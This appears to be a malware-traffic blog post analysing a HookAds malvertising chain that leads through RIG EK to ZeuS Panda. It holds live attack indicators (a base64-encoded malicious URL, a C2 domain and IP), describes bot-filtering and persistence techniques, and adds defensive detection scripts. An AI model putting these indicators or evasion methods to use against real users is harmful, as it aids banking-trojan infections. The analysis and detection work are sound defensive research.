HookAds Campaign Leads to RIG EK and Drops ZeuS Panda.

The HookAds campaign is still active and there have been some recent changes. For starters, this campaign usually drops a variant of Ursnif known as Dreambot. However, the sample that I got today seems more likely to be a ZeuS variant. This was later confirmed by my friend @Antelox who identified it as ZeuS Panda.

Let’s first look at the HTTP traffic involved in the infection chain and then we will examine some of the code:

We see my host making connections to the decoy site, which I've hidden. Normally, a host would be redirected to one of these decoy sites via malvertising.

The decoy site still contains a script to grab the file popunder.php:

Popunder.php contains the following packed and obfuscated code:

Running the code shows variable p returning the following code:

At the bottom of the code you can see var scr = being assigned a base64-encoded string:

aHR0cDovL3JvY2tzaWRlbnQuaW5mby9iYW5uZXJzL2FkdmVydGlzaW5n

Decoding the string returns the following URL:

hxxp://rocksident.info/banners/advertising

We can also see that an iframe is inserted into the web page, instructing the browser to load content from the malicious URL.
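As an added example (not code from the original post), here is a small triage script for the pattern described above: it finds base64 literals assigned to JavaScript variables, decodes the ones that turn out to be URLs, checks for iframe creation, and defangs the result the way the post writes its URLs. The base64 value is the one quoted above; the surrounding JavaScript in SAMPLE_JS is constructed and is not the actual popunder.php output.

```python
import base64
import binascii
import re

# Constructed stand-in for the deobfuscated popunder.php output. The base64
# value is the one quoted in the post; the surrounding JavaScript is made up
# to show the pattern (encoded URL assigned to a variable, then an iframe).
SAMPLE_JS = r'''
var p = "short";
var scr = "aHR0cDovL3JvY2tzaWRlbnQuaW5mby9iYW5uZXJzL2FkdmVydGlzaW5n";
var f = document.createElement("iframe");
f.style.display = "none";
f.src = atob(scr);
document.body.appendChild(f);
'''

# "var name = '<base64>'" with at least 16 base64 characters; shorter literals
# produce too many false positives to be worth decoding.
B64_ASSIGNMENT = re.compile(r'var\s+(\w+)\s*=\s*["\']([A-Za-z0-9+/]{16,}={0,2})["\']')

# iframe construction, either as inline markup or through the DOM API.
IFRAME_PATTERNS = (
    re.compile(r'<iframe\b', re.I),
    re.compile(r'createElement\(\s*["\']iframe["\']\s*\)', re.I),
)


def defang(url: str) -> str:
    """Write a URL the way the post does (hxxp) so it is not clickable in a report."""
    return re.sub(r'^http', 'hxxp', url, flags=re.I)


def decode_url_literals(js: str) -> list[tuple[str, str]]:
    """Return (variable, decoded_url) for each base64 literal that decodes to a URL."""
    hits = []
    for name, blob in B64_ASSIGNMENT.findall(js):
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # random-looking string that is not base64 text
        if text.lower().startswith(("http://", "https://", "//")):
            hits.append((name, text))
    return hits


def injects_iframe(js: str) -> bool:
    """True if the script builds or embeds an iframe."""
    return any(p.search(js) for p in IFRAME_PATTERNS)


def report(js: str) -> list[str]:
    """Human-readable findings: decoded URLs, plus a note when an iframe is also created."""
    lines = [f"{name} -> {defang(url)}" for name, url in decode_url_literals(js)]
    if lines and injects_iframe(js):
        lines.append("iframe injection present; decoded URL is the likely iframe source")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_JS)))
```

The 16-character minimum and the URL-prefix check keep the decoder from reporting every identifier that happens to be valid base64; for other campaigns you would widen the regex to cover assignments without the var keyword.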

The URL returns what has been called the pre-landing page, which is designed to filter out unwanted traffic. Here is an image of the pre-landing page showing some more packed code:

The browser will execute the embedded script, allowing us to examine the contents of variable p:

Here we can see that if (BrowserInfo.is_bot == true) then the host should expect to see a page showing “404 Not Found,” among other things. This is followed by the else branch, which specifies the block of code to be executed if that condition is false (the visitor is not classified as a “bot”).

An in-depth report from G Data, which can be found HERE, explains how ZeuS Panda finds a directory under %APPDATA%\Roaming\ that is empty, has a path that is at least 140 characters long, doesn’t contain certain strings like “Microsoft”, and is as deep in the directory tree as possible. Their analysis also showed that Panda created four files with random extensions. In my infection these happened to be .hou, .oze, .pow, and .sol.
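The directory-selection rules above translate directly into a hunting heuristic. The following script is an added example, not from the post or from the G Data report: find_candidate_dirs lists the empty directories Panda would have considered, and find_suspicious_drops lists directories that satisfy the same path rules but now contain only a handful of files with unusual three-letter extensions, like the .hou/.oze/.pow/.sol files seen in this infection. The excluded-substring tuple only contains "Microsoft" because that is the only string the text names, and the COMMON_EXTENSIONS allow-list is an assumption; build_demo_tree creates a constructed tree in a temp directory so the script runs offline.

```python
import os
import tempfile

MIN_PATH_LEN = 140
# The report mentions "certain strings like Microsoft"; only that one is known
# from the text, so this tuple is an assumption to be extended.
EXCLUDED_SUBSTRINGS = ("microsoft",)
# Extensions treated as ordinary (assumed list). Panda's four files used random
# three-letter extensions such as .hou/.oze/.pow/.sol in this infection.
COMMON_EXTENSIONS = {".txt", ".log", ".ini", ".dat", ".xml", ".json", ".db",
                     ".tmp", ".lnk", ".dll", ".exe"}


def _path_qualifies(path, min_len=MIN_PATH_LEN, excluded=EXCLUDED_SUBSTRINGS):
    """Path rules from the report: long enough and free of excluded substrings."""
    lowered = path.lower()
    return len(path) >= min_len and not any(s in lowered for s in excluded)


def find_candidate_dirs(root):
    """Empty directories under root that match the selection rules, deepest first."""
    hits = [d for d, subdirs, files in os.walk(root)
            if not subdirs and not files and _path_qualifies(d)]
    return sorted(hits, key=lambda p: p.count(os.sep), reverse=True)


def find_suspicious_drops(root, max_files=8):
    """Directories matching the path rules that hold only a few files with
    three-letter extensions outside the allow-list. Returns (dirpath, sorted
    extensions) pairs, deepest first."""
    hits = []
    for d, subdirs, files in os.walk(root):
        if subdirs or not files or len(files) > max_files or not _path_qualifies(d):
            continue
        exts = sorted(os.path.splitext(f)[1].lower() for f in files)
        # len(e) == 4 means a dot plus three characters, e.g. ".hou"
        if all(len(e) == 4 and e not in COMMON_EXTENSIONS for e in exts):
            hits.append((d, exts))
    return sorted(hits, key=lambda h: h[0].count(os.sep), reverse=True)


# Constructed directory names, long enough that the leaf path exceeds 140
# characters regardless of where the temp directory lives.
SEGMENTS = [
    "ConstructedVendorDataStoreAlpha",
    "CacheSegmentBetaGammaDeltaEpsilon",
    "ProfileSyncContainerZetaEtaTheta",
    "NestedIntermediateIotaKappaLambda",
    "DeepestCandidateDirectoryMuNuXi",
]


def build_demo_tree():
    """Create a constructed tree in a temp directory and return its root."""
    root = tempfile.mkdtemp(prefix="panda_demo_")
    os.makedirs(os.path.join(root, *SEGMENTS))                # qualifying and empty
    os.makedirs(os.path.join(root, "Microsoft", *SEGMENTS))   # excluded by substring
    os.makedirs(os.path.join(root, "ShortEmpty"))             # excluded by path length
    parent = os.path.join(root, *SEGMENTS[:4])
    drop = os.path.join(parent, "DropSiteOmicronPiRhoSigmaTau")
    os.makedirs(drop)
    for name in ("a.hou", "b.oze", "c.pow", "d.sol"):         # extensions seen in the post
        open(os.path.join(drop, name), "w").close()
    benign = os.path.join(parent, "BenignNotesUpsilonPhiChiPsiOmega")
    os.makedirs(benign)
    open(os.path.join(benign, "notes.txt"), "w").close()      # ordinary extension
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    print("candidate install dirs:", find_candidate_dirs(demo_root))
    print("suspicious drop dirs:", find_suspicious_drops(demo_root))
```

To hunt on a real host you would point both functions at the user's %APPDATA% tree instead of the demo root; the candidate list tells you where a fresh install would land, and the drop list is what to look at after the fact.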

HKCU\Software\Microsoft\Windows\CurrentVersion\Run is used as the persistence mechanism:

Additional keys are created under HKCU\Software\Microsoft\:

Not long after the payload was dropped and executed on the host, we see post-infection network traffic to 5.8.88.219 via TCP port 443:

Here are some additional DNS queries and responses captured during my second run:

This shows DNS requests for nekfad.xyz, which resolves to 5.8.88.219, as well as a PTR record with the hostname davydovamihalina02.example.com.
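The network indicators in this post (the nekfad.xyz domain, the 5.8.88.219 address, the TCP/443 callback and the PTR hostname) can be turned into a simple log check. The script below is an added example, not part of the original post: it runs the indicators over two constructed logs whose line formats are made up for this example (they are not Zeek, Suricata or any real tool's format), flags DNS queries for the domain, answers carrying the address, reverse lookups of the address and PTR answers naming the hostname, and flags connections to the address on 443.

```python
# Indicators of compromise taken from the post above.
IOC_DOMAINS = {"nekfad.xyz", "davydovamihalina02.example.com"}
IOC_IPS = {"5.8.88.219"}
IOC_PORTS = {443}  # only meaningful together with an IOC address


def reverse_name(ip: str) -> str:
    """in-addr.arpa name for an IPv4 address, to catch PTR lookups of an IOC."""
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"


IOC_REVERSE = {reverse_name(ip) for ip in IOC_IPS}

# Constructed DNS log, one record per line: "epoch client qname qtype rdata".
# The first two lines mirror the queries described in the post; the rest are
# benign filler using documentation addresses.
DNS_LOG = """\
1510000001 10.0.0.5 nekfad.xyz A 5.8.88.219
1510000002 10.0.0.5 219.88.8.5.in-addr.arpa PTR davydovamihalina02.example.com
1510000003 10.0.0.5 example.org A 192.0.2.10
1510000004 10.0.0.7 updates.example.net A 192.0.2.20
""".splitlines()

# Constructed connection log: "epoch client dst_ip dst_port proto".
CONN_LOG = """\
1510000005 10.0.0.5 5.8.88.219 443 tcp
1510000006 10.0.0.5 192.0.2.10 443 tcp
1510000007 10.0.0.7 192.0.2.20 80 tcp
""".splitlines()


def scan_dns_log(lines):
    """Return (epoch, client, [reasons]) for every DNS record touching an IOC."""
    hits = []
    for line in lines:
        ts, client, qname, qtype, rdata = line.split()
        qname, rdata = qname.lower().rstrip("."), rdata.lower().rstrip(".")
        reasons = []
        if qname in IOC_DOMAINS:
            reasons.append(f"query for IOC domain {qname}")
        if qname in IOC_REVERSE:
            reasons.append(f"reverse lookup of IOC address via {qname}")
        if rdata in IOC_IPS:
            reasons.append(f"answer points at IOC address {rdata}")
        if qtype.upper() == "PTR" and rdata in IOC_DOMAINS:
            reasons.append(f"PTR answer names IOC hostname {rdata}")
        if reasons:
            hits.append((ts, client, reasons))
    return hits


def scan_conn_log(lines):
    """Return (epoch, client, reason) for connections to an IOC address on an IOC port."""
    hits = []
    for line in lines:
        ts, client, dst, port, proto = line.split()
        if dst in IOC_IPS and int(port) in IOC_PORTS:
            hits.append((ts, client, f"{proto} connection to {dst}:{port}"))
    return hits


if __name__ == "__main__":
    for hit in scan_dns_log(DNS_LOG) + scan_conn_log(CONN_LOG):
        print(hit)
```

The reverse-name check matters because a PTR lookup of the address does not mention nekfad.xyz at all; matching only on the forward domain would miss that second query.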